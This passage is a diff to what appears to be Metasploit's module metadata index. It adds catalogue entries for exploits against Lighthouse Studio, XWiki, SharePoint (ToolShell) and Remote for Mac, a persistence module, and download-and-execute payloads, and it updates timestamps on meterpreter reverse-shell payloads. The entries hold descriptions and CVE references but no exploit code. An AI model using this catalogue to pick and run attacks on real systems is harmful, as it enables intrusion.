+    "description": "This module exploits a template injection vulnerability in the\n          Sawtooth Software Lighthouse Studio's `ciwweb.pl` web application.\n          The application fails to properly sanitize user input within survey templates,\n          allowing unauthenticated attackers to inject and execute arbitrary Perl commands\n          on the target system.\n\n          This vulnerability affects Lighthouse Studio versions prior to 9.16.14.\n          Successful exploitation may result in remote code execution under the privileges\n          of the web server, potentially exposing sensitive data or disrupting survey operations.\n\n          An attacker can execute arbitrary system commands in the context of the user running the web server.",
+    "references": [
+      "CVE-2025-34300",
+      "URL-https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/"
+    ],
+    "platform": "Multi",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Windows Command"
+    ],
+    "mod_time": "2025-07-26 03:15:00 +0000",
+    "path": "/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/lighthouse_studio_unauth_rce_cve_2025_34300",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/log1cms_ajax_create_folder": {
    "name": "Log1 CMS writeInfo() PHP Code Injection",
    "fullname": "exploit/multi/http/log1cms_ajax_create_folder",
@@ -117545,7 +118183,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2024-06-14 12:05:12 +0000",
+    "mod_time": "2025-08-22 17:01:41 +0000",
    "path": "/modules/exploits/multi/http/torchserver_cve_2023_43654.rb",
    "is_install_path": true,
    "ref_name": "multi/http/torchserver_cve_2023_43654",
@@ -121075,6 +121713,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/xwiki_unauth_rce_cve_2025_24893": {
+    "name": "Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)",
+    "fullname": "exploit/multi/http/xwiki_unauth_rce_cve_2025_24893",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-02-20",
+    "type": "exploit",
+    "author": [
+      "Maksim Rogov",
+      "John Kwak"
+    ],
+    "description": "This module exploits a template injection vulnerability in the the XWiki Platform.\n          XWiki includes a macro called SolrSearch (defined in Main.SolrSearchMacros) that enables full-text search through the embedded Solr engine.\n          The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.\n\n          This vulnerability affects XWiki Platform versions >= 5.3-milestone-2 and < 15.10.11, and versions >= 16.0.0-rc-1 and < 16.4.1.\n          Successful exploitation may result in the remote code execution under the privileges\n          of the web server, potentially exposing sensitive data or disrupting survey operations.\n\n          An attacker can execute arbitrary system commands in the context of the user running the web server.",
+    "references": [
+      "CVE-2025-24893",
+      "URL-https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Windows Command"
+    ],
+    "mod_time": "2025-08-29 08:41:43 +0000",
+    "path": "/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/xwiki_unauth_rce_cve_2025_24893",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/zabbix_script_exec": {
    "name": "Zabbix Authenticated Remote Command Execution",
    "fullname": "exploit/multi/http/zabbix_script_exec",
@@ -121707,6 +122405,57 @@
    "needs_cleanup": null,
    "actions": []
  },
+  "exploit_multi/local/periodic_script_persistence": {
+    "name": "Periodic Script Persistence",
+    "fullname": "exploit/multi/local/periodic_script_persistence",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2012-04-01",
+    "type": "exploit",
+    "author": [
+      "gardnerapp",
+      "msutovsky-r7"
+    ],
+    "description": "This module will achieve persistence by writing a script to the /etc/periodic directory.\n          According to The Art of Mac Malware no such malware species persist in this manner (2024).\n          This payload requires root privileges to run. This module can be run on BSD, OSX or Arch Linux.",
+    "references": [],
+    "platform": "BSD,OSX,Unix",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "OSX",
+      "Python",
+      "Unix",
+      "Bsd"
+    ],
+    "mod_time": "2025-08-29 17:53:07 +0000",
+    "path": "/modules/exploits/multi/local/periodic_script_persistence.rb",
+    "is_install_path": true,
+    "ref_name": "multi/local/periodic_script_persistence",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
  "exploit_multi/local/vagrant_synced_folder_vagrantfile_breakout": {
    "name": "Vagrant Synced Folder Vagrantfile Breakout",
    "fullname": "exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout",
@@ -127734,6 +128483,63 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_osx/misc/remote_for_mac_udp_rce": {
+    "name": "Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE",
+    "fullname": "exploit/osx/misc/remote_for_mac_udp_rce",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-05-27",
+    "type": "exploit",
+    "author": [
+      "Chokri Hammedi"
+    ],
+    "description": "This module exploits an unauthenticated remote code execution vulnerability in Remote for Mac 2025.6.\n          When the \"Allow unknown devices\" setting is enabled, it is possible to simulate keyboard input via UDP packets\n          without authentication. By sending a sequence of key presses, an attacker can open the Terminal and execute\n          arbitrary shell commands, achieving code execution as the current user.",
+    "references": [
+      "PACKETSTORM-196351"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Shell"
+    ],
+    "mod_time": "2025-08-28 09:11:01 +0000",
+    "path": "/modules/exploits/osx/misc/remote_for_mac_udp_rce.rb",
+    "is_install_path": true,
+    "ref_name": "osx/misc/remote_for_mac_udp_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_osx/misc/ufo_ai": {
    "name": "UFO: Alien Invasion IRC Client Buffer Overflow",
    "fullname": "exploit/osx/misc/ufo_ai",
@@ -179399,6 +180205,81 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/sharepoint_toolpane_rce": {
+    "name": "Microsoft SharePoint Server ToolPane Unauthenticated Remote Code Execution (aka ToolShell)",
+    "fullname": "exploit/windows/http/sharepoint_toolpane_rce",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-07-08",
+    "type": "exploit",
+    "author": [
+      "Viettel Cyber Security",
+      "sfewer-r7"
+    ],
+    "description": "This module exploits the authentication bypass vulnerabilities CVE-2025-49706 and CVE-2025-53771, and an unsafe\n          deserialization vulnerability CVE-2025-49704, to achieve unauthenticated RCE against a vulnerable Microsoft\n          SharePoint Server. The vulnerability CVE-2025-53770 was disclosed as being a patch bypass of CVE-2025-49704,\n          and as described by the finders, CVE-2025-53770 targets a different endpoint within the /_vti_bin/ URI path.\n          As this exploit module does not target the endpoint associated with CVE-2025-53770 (per the original finders),\n          we believe this module is best described as exploiting CVE-2025-49704 and not CVE-2025-53770.",
+    "references": [
+      "CVE-2025-49704",
+      "CVE-2025-49706",
+      "CVE-2025-53770",
+      "CVE-2025-53771",
+      "URL-https://blog.viettelcybersecurity.com/sharepoint-toolshell/",
+      "URL-https://blog.leakix.net/2025/07/using-their-own-weapons-for-defense-a-sharepoint-story/",
+      "URL-https://securelist.com/toolshell-explained/",
+      "URL-https://www.zerodayinitiative.com/advisories/ZDI-25-580/",
+      "URL-https://www.zerodayinitiative.com/advisories/ZDI-25-581/",
+      "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49704",
+      "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49706",
+      "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770",
+      "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53771",
+      "URL-https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/",
+      "URL-https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/",
+      "URL-https://gist.github.com/gboddin/6374c04f84b58cef050f5f4ecf43d501",
+      "URL-https://x.com/codewhitesec/status/1944743478350557232",
+      "URL-https://x.com/thezdi/status/1923317597673533552",
+      "URL-https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Default"
+    ],
+    "mod_time": "2025-08-06 15:33:57 +0000",
+    "path": "/modules/exploits/windows/http/sharepoint_toolpane_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/sharepoint_toolpane_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/sharepoint_unsafe_control": {
    "name": "Microsoft SharePoint Unsafe Control and ViewState RCE",
    "fullname": "exploit/windows/http/sharepoint_unsafe_control",
@@ -203778,7 +204659,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-09 07:19:14 +0000",
    "path": "/modules/payloads/singles/android/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "android/meterpreter_reverse_http",
@@ -203807,7 +204688,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-09 07:19:14 +0000",
    "path": "/modules/payloads/singles/android/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "android/meterpreter_reverse_https",
@@ -203836,7 +204717,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-09 07:19:14 +0000",
    "path": "/modules/payloads/singles/android/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "android/meterpreter_reverse_tcp",
@@ -203975,7 +204856,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_http",
@@ -204008,7 +204889,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_https",
@@ -204041,7 +204922,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp",
@@ -204103,7 +204984,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_http",
@@ -204136,7 +205017,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_https",
@@ -204169,7 +205050,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
@@ -204553,7 +205434,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-09 07:19:14 +0000",
    "path": "/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "bsd/x86/metsvc_bind_tcp",
@@ -204584,7 +205465,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-09 07:19:14 +0000",
    "path": "/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "bsd/x86/metsvc_reverse_tcp",
@@ -220760,6 +221641,40 @@
    "stage_refname": "windows/x64/custom",
    "stager_refname": "windows/x64/reverse_winhttps"
  },
+  "payload_cmd/windows/http/x64/download_exec": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/windows/http/x64/download_exec",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Fetch and execute an x64 payload from an HTTP server.",
+    "references": [],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-01-03 14:46:15 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/http/x64/download_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/windows/http/x64",
+    "adapted_refname": "windows/x64/download_exec",
+    "staged": false
+  },
  "payload_cmd/windows/http/x64/encrypted_shell/reverse_tcp": {
    "name": "HTTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/cmd/windows/http/x64/encrypted_shell/reverse_tcp",
@@ -223767,6 +224682,40 @@
    "stage_refname": "windows/x64/custom",
    "stager_refname": "windows/x64/reverse_winhttps"
  },
+  "payload_cmd/windows/https/x64/download_exec": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/windows/https/x64/download_exec",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Fetch and execute an x64 payload from an HTTPS server.",
+    "references": [],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-01-03 14:46:15 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/https/x64/download_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/windows/https/x64",
+    "adapted_refname": "windows/x64/download_exec",
+    "staged": false
+  },
  "payload_cmd/windows/https/x64/encrypted_shell/reverse_tcp": {
    "name": "HTTPS Fetch, Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/cmd/windows/https/x64/encrypted_shell/reverse_tcp",
@@ -235327,6 +236276,40 @@
    "stage_refname": "windows/x64/custom",
    "stager_refname": "windows/x64/reverse_winhttps"
  },
+  "payload_cmd/windows/powershell/x64/download_exec": {
+    "name": "Powershell Exec",
+    "fullname": "payload/cmd/windows/powershell/x64/download_exec",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell",
+    "references": [],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/download_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/windows/powershell/x64",
+    "adapted_refname": "windows/x64/download_exec",
+    "staged": false
+  },
  "payload_cmd/windows/powershell/x64/encrypted_shell/reverse_tcp": {
    "name": "Powershell Exec, Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/cmd/windows/powershell/x64/encrypted_shell/reverse_tcp",
@@ -238952,6 +239935,40 @@
    "stage_refname": "windows/x64/custom",
    "stager_refname": "windows/x64/reverse_winhttps"
  },
+  "payload_cmd/windows/smb/x64/download_exec": {
+    "name": "SMB Fetch",
+    "fullname": "payload/cmd/windows/smb/x64/download_exec",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Fetch and execute an x64 payload from an SMB server.",
+    "references": [],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-07 15:59:31 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/smb/x64/download_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/windows/smb/x64",
+    "adapted_refname": "windows/x64/download_exec",
+    "staged": false
+  },
  "payload_cmd/windows/smb/x64/encrypted_shell/reverse_tcp": {
    "name": "SMB Fetch, Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/cmd/windows/smb/x64/encrypted_shell/reverse_tcp",
@@ -241959,6 +242976,40 @@
    "stage_refname": "windows/x64/custom",
    "stager_refname": "windows/x64/reverse_winhttps"
  },
+  "payload_cmd/windows/tftp/x64/download_exec": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/windows/tftp/x64/download_exec",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Fetch and execute an x64 payload from a TFTP server.",
+    "references": [],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-01-03 14:46:15 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/tftp/x64/download_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/windows/tftp/x64",
+    "adapted_refname": "windows/x64/download_exec",
+    "staged": false
+  },
  "payload_cmd/windows/tftp/x64/encrypted_shell/reverse_tcp": {
    "name": "TFTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/cmd/windows/tftp/x64/encrypted_shell/reverse_tcp",
@@ -245102,7 +246153,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_http",
@@ -245135,7 +246186,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_https",
@@ -245168,7 +246219,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_tcp",
@@ -245261,7 +246312,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_http",
@@ -245294,7 +246345,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_https",
@@ -245327,7 +246378,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_tcp",
@@ -245524,7 +246575,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_http",
@@ -245557,7 +246608,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_https",
@@ -245590,7 +246641,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_tcp",
@@ -245753,7 +246804,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_http",
@@ -245786,7 +246837,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_https",
@@ -245819,7 +246870,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_tcp",
@@ -245921,7 +246972,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_http",
@@ -245954,7 +247005,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_https",
@@ -245987,7 +247038,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
@@ -246225,7 +247276,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_http",
@@ -246258,7 +247309,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_https",
@@ -246291,7 +247342,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_tcp",
@@ -246458,7 +247509,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_http",
@@ -246491,7 +247542,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_https",
@@ -246524,7 +247575,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
